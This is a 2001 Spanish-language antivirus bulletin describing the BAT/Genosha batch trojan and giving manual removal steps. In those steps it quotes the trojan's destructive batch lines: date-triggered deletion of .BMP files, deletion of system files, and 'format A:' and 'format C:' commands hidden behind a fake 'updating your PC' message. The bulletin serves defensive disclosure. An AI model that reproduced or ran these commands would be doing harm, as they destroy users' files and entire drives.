VSantivirus No. 277 - Año 5 - Miércoles 11 de abril de 2001
[Tomado de Virus Attack! - http://www.virusattack.com.ar]
Nombre: BAT/Genosha
Tipo: Caballo de Troya
Alias: BAT_Genosha, Trojan.BAT.DelSys.h
Fecha: 3/abr/01
Es un destructivo troyano que modifica el AUTOEXEC.BAT y elimina archivos
.BMP en el directorio Windows, además de poder llegar a eliminar toda información de las unidades
A: y C:.
Si se ejecuta este archivo batch (.BAT), el mismo buscará en el directorio
\Windows\Escrit~1 un archivo de nombre GENOSHA; si el mismo no existe, modificará el
AUTOEXEC.BAT.
Las acciones que realizará desde el AUTOEXEC.BAT modificado serán:
Si la fecha coincide con la que contiene en el código del archivo, eliminará todos los archivos
.BMP (Bitmap) en el directorio \Windows.
Eliminará el archivo KEYBOARD.SYS dentro del directorio
\Windows\Command.
Creará un directorio \gugugaga, y dentro de él, un archivo
ORALE.TXT.
Mostrará un mensaje por pantalla:
Por favor, prenda la impresora, la informacion esta siendo
procesada. Espere dos segundos y presione una tecla.
Y por impresora:
"The game is over. You was defeated."
Luego, creará 4 archivos en el directorio \Windows\Escrit~1: ZOMBIE, ALARMA, GENOSHA,
GAMBIT, los cuales contienen el mismo código del virus.
Si comprueba que el archivo GENOSHA existe al ejecutarse, eliminará el archivo
\Windows\win.com y mostrará el mensaje:
Espere mientras se actualizan los datos de su pc.
Intentará también formatear las unidades A: y C: desde un archivo
BOOTDISK.BAT que creará en el directorio \Windows\Command.
Para eliminar manualmente el virus, siga estos pasos:
1. Edite el archivo c:\autoexec.bat con el NotePad (Bloc de Notas) y elimine las siguientes líneas:
----------------------gargajo.bat
@set primi=7
echo.date|find "25/04/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/05/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/06/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "03/07/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/07/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "28/07/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/08/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/09/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/10/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/11/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/12/2001">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/01/2002">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
echo.date|find "25/01/2002">nul %7%
if errorlevel 1 del C:\windows\*.bmp %7%
del c:\windows\command\keyboard.sys %7%
2. Elimine el directorio c:\gugugaga.
3. Si no existen, restituya los archivos:
\Windows\Command\keyboard.sys
\Windows\win.com
4. Elimine las siguientes líneas del archivo
\Windows\Command\bootdisk.bat:
---------- gargajo.bat
echo.date|find "25/06/2001">nul %7%
@cls %6%
@echo Espere mientras se actualizan los datos de su pc. %6%
@format A: %6%
@format C: %6%
@set cid=6
5. Elimine todos los archivos detectados como
BAT/Genosha, o los alias antes mencionados.
El troyano se activa al ser ejecutado por el propio usuario, en forma accidental, o al ser engañado éste en forma premeditada para hacerlo.
Se recomienda no abrir archivos enviados sin su consentimiento, ni ejecutar nada descargado de Internet, sin revisarlo antes con uno o dos antivirus al día.
Fuente: Trend Micro Inc. (análisis de un ejemplo reportado por Virus Attack!)
|